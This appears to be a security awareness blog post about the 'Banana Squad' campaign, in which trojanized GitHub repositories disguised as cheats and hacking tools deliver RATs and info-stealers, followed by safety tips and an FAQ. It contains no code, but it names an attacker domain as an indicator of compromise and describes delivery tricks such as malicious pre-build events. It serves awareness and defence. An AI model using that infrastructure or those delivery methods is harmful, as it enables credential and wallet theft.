Trojanized GitHub Repositories Target Gamers and Developers in Massive Malware Campaign (2025)
Over 200+ trojanized GitHub repositories targeting gamers and developers were discovered, spreading malware disguised as Python hacking tools and cheats. Learn how this campaign works, the risks it poses, and how to stay safe when downloading from GitHub.
Table of Contents
- Introduction
- What Is the Banana Squad Campaign?
- How Do These Trojanized Repositories Work?
- Types of Backdoors Found
- Payloads Delivered
- Real-World Campaigns Using Similar Tactics
- Key Indicators of Compromise (IOCs)
- How to Stay Safe: GitHub Security Tips
- Conclusion
- Frequently Asked Questions (FAQs)
Introduction
In June 2025, cybersecurity researchers exposed a widespread campaign targeting gamers and developers through trojanized GitHub repositories. Dubbed “Banana Squad” by ReversingLabs, this ongoing operation exploits the trust in open-source platforms by injecting backdoors and malware into fake Python-based tools. The end goal? Harvesting sensitive data, gaining persistent remote access, and compromising development environments.
This blog unpacks the tactics, tools, infection chains, and security lessons from this campaign—especially vital for cybersecurity enthusiasts, developers, and ethical hackers.
What Is the Banana Squad Campaign?
Banana Squad is a malicious campaign that involves over 200+ backdoored GitHub repositories. These repos impersonate legitimate tools—mostly Python hacking utilities, game cheats, and Discord account cleaners—but silently deliver malware payloads to infect the target’s system.
Origin
-
Initial discovery: 2023 (via PyPI)
-
Reignited in 2024-2025 using GitHub
-
Disguised tools: Fortnite cheats, TikTok username checkers, PayPal bulk account checkers, Discord cleaners
How Do These Trojanized Repositories Work?
The threat actors strategically upload repositories under popular names, leveraging GitHub features to boost visibility (stars, forks, subscribers). These projects lure novice developers or gamers looking for modding tools or account utilities.
Infection Mechanism:
| Stage | Action |
|---|---|
| 1. Discovery | User finds a promising GitHub repo with good stars and forks. |
| 2. Cloning/Download | The repo is cloned or downloaded into the system. |
| 3. Code Execution | Running a script or opening a Visual Studio project triggers hidden pre-build events. |
| 4. Malware Injection | Malicious payloads are downloaded or executed. |
| 5. Data Exfiltration | Info-stealers collect credentials, tokens, wallet keys, and send them to attacker servers. |
Types of Backdoors Found
Researchers found 4 major types of backdoors:
-
Python Script Backdoors
-
Deliver information stealers and payload loaders
-
Target: Windows OS
-
-
Visual Studio PreBuild Events
-
Malware triggered before actual compilation
-
Hard to detect in CI/CD environments
-
-
Screensaver (.scr) Files
-
Disguised executables in Windows systems
-
Used for remote code execution
-
-
Malicious JavaScript Files
-
Serve as droppers for other RATs
-
Communicate via Telegram APIs
-
Payloads Delivered
The campaign deployed a range of Remote Access Trojans (RATs) and info-stealers:
-
AsyncRAT
-
Remcos RAT
-
Lumma Stealer
-
Custom Java-based stealers
-
Exodus Wallet injectors
Each of these tools was designed to steal credentials, capture screenshots, record keystrokes, or gain remote access to infected systems.
Real-World Campaigns Using Similar Tactics
Stargazers Ghost Network
-
Hosted Minecraft mods that dropped Java-based stealers.
-
Used fake GitHub stars to boost repo credibility.
Water Curse Campaign (Trend Micro)
-
Found 76 GitHub repos distributing credential-stealing malware.
Sakura-RAT (Sophos)
-
Exploited GitHub-hosted code to infect malware developers themselves.
Key Indicators of Compromise (IOCs)
-
Repositories cloned from suspicious GitHub accounts
-
Scripts attempting external connections (e.g., Pastebin, Telegram)
-
Use of
[email protected]in commits -
PreBuild event anomalies in
.csprojor.slnfiles -
Connections to domains like
dieserbenni[.]ru
How to Stay Safe: GitHub Security Tips
| Best Practice | Why It Matters |
|---|---|
| Use official sources only | Avoid repositories with suspicious origins or vague documentation. |
| Review the code before execution | Always analyze .py, .js, or .csproj files for hidden payloads. |
| Verify repository history | Look at committers, contributors, and issue discussions. |
| Use sandbox or VM for testing | Protect your host machine from infections. |
| Apply endpoint protection and sandboxing tools | Detect and block malicious behavior early. |
Conclusion
This campaign underscores the dark side of open-source ecosystems when security is not enforced. GitHub is increasingly becoming a Distribution-as-a-Service (DaaS) platform for cybercriminals who exploit community trust and software reuse.
For developers and gamers alike, being aware is not enough—we must vet, validate, and verify every tool we use.
Frequently Asked Questions (FAQs)
What is a trojanized GitHub repository?
A trojanized GitHub repository is a seemingly legitimate project that hides malicious code or scripts, designed to infect systems or steal data.
How are developers being targeted through GitHub?
Cybercriminals upload fake tools and libraries that execute malware when developers clone or run the code.
What is the Banana Squad campaign?
It’s a 2025 malware operation that posted over 200 trojanized repositories on GitHub to infect gamers and developers.
Why do hackers use GitHub for malware distribution?
GitHub is trusted by developers. Malware embedded in public code spreads easily and often goes unnoticed.
What kind of malware was used in the Banana Squad operation?
Mainly info-stealers and remote access trojans like AsyncRAT, Remcos, and Lumma Stealer.
Which platforms are being targeted by this campaign?
Windows systems used by gamers and developers are the primary targets.
Are all GitHub projects safe?
No. Always verify the source, contributors, and activity before using any project.
How can I tell if a GitHub repo is malicious?
Look for inconsistencies in stars, forks, strange script behavior, or unknown contributors.
What tools did the malware target?
Popular tools like Discord, PayPal, TikTok, Steam, and even Exodus crypto wallets.
Can antivirus software detect this malware?
Some can, but many payloads are obfuscated or polymorphic, making them hard to detect.
What’s the role of fake GitHub stars in malware campaigns?
They falsely increase repo credibility to mislead users into trusting the content.
How do backdoors get injected in GitHub code?
They’re often hidden in Python scripts, pre-build Visual Studio events, or scripts that auto-run.
What is a PreBuild backdoor?
A malicious script that runs automatically when a project is built or compiled in Visual Studio.
What other campaigns are similar to Banana Squad?
Water Curse, Stargazers Ghost Network, and Sakura-RAT campaigns also used GitHub for malware delivery.
What should I do if I downloaded a suspicious GitHub project?
Disconnect from the internet, run a deep malware scan, and restore from a clean backup if needed.
Can GitHub remove malicious repositories?
Yes, once flagged, GitHub takes action to remove harmful content and disable associated accounts.
How do malware campaigns use YouTube and Discord?
They post fake tutorials and links to the trojanized GitHub repositories to trap users.
Are gamers the only targets?
No, although gamers are common targets, developers and even cybersecurity researchers are at risk.
How do I verify a GitHub repository’s authenticity?
Check contributors, commit history, issue responses, and recent activity. Trust only verified sources.
Is GitHub doing anything to fight malware?
GitHub uses automated scans and community reporting but the volume makes it challenging.
What is an info-stealer?
A type of malware designed to steal personal information like credentials, tokens, and wallet data.
Why are open-source developers being targeted?
Because they rely on shared codebases, making them vulnerable to backdoored dependencies.
How do Visual Studio PreBuild scripts execute malware?
They run code before compilation, allowing malware to be executed silently.
What are DaaS platforms in cybersecurity?
DaaS or Distribution-as-a-Service platforms distribute malware tools for cybercriminal operations.
What is the danger of modifying GitHub code blindly?
It may execute embedded scripts or activate malware unintentionally.
How can I report a suspicious GitHub repo?
Use the "Report content" button on GitHub or contact GitHub support directly.
Can I get hacked just by cloning a GitHub repo?
No, but running or building unverified scripts from it can infect your system.
What are safe practices when using GitHub code?
Use sandboxing, read code before running, scan for malware, and verify contributor reputations.
Why do threat actors use themes like gaming cheats?
These themes attract high traffic and less cautious users who don’t verify code sources.
Is malware on GitHub a new trend?
No, but it has escalated significantly with sophisticated campaigns and fake credibility signals.
What tools can help scan GitHub repositories?
Tools like GitHub Advanced Security, SonarQube, and ReversingLabs can detect malicious code patterns.
![Top 10 Ethical Hackers in the World [2025]](https://www.webasha.com/blog/uploads/images/202408/image_100x75_66c2f983c207b.webp)
![[2025] Top 100+ VAPT Interview Questions and Answers](https://www.webasha.com/blog/uploads/images/image_100x75_6512b1e4b64f7.jpg)
